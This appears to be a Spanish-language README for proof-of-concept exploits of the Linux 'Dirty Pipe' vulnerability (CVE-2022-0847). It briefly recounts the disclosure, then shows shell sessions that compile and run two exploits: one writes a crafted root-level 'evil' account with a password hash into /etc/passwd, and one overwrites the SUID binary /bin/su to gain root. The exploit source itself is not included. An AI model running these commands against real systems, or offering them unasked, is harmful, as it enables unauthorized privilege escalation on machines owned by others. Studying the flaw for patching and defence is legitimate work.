
Pruebas de concepto para CVE-2022-0847 (Dirty Pipe) que permiten la escalada de privilegios local en kernels de Linux 5.8+ mediante la sobrescritura de archivos de solo lectura o binarios SUID.
Hoy, el investigador de seguridad Max Kellermann divulgó responsablemente la vulnerabilidad 'Dirty Pipe' y afirmó que afecta a Linux Kernel 5.8 y versiones posteriores, incluso en dispositivos Android.
La vulnerabilidad se rastrea como CVE-2022-0847 y permite a un usuario no privilegiado inyectar y sobrescribir datos en archivos de solo lectura, incluidos procesos SUID que se ejecutan como root.
Kellerman descubrió el error después de rastrear un bug que estaba corrompiendo los registros de acceso del servidor web de uno de sus clientes.
Luego Bl4sty escribió otra versión. En lugar de sobrescribir un archivo como /etc/passwd, sobrescribe un binario SUID especificado por el usuario (como /bin/su), inyectando shellcode que luego se ejecuta con permisos de usuario privilegiado (es decir, root).
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC1.c -o exploit1
┌──(ghost㉿uchiha)-[~]
└─$./exploit1 /etc/passwd 189 'evil:$6$USR$aNQSBWd3Bdn4Eo8ZaAjBBXW7M3CM7NnW3vX0Ulrei18dDifAiS0pB2iqCxVCK0nCKfRjdCSqgKHagkul6JEHT/:0:0::/root:/bin/bash
'
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC2.c -o exploit2
┌──(ghost㉿uchiha)-[~]
└─$./exploit2 /bin/su
Para un uso detallado, consulte: https://medium.com/@ajithcrajendran/cve-2022-0847-dirty-pipe-a5d68f422dcf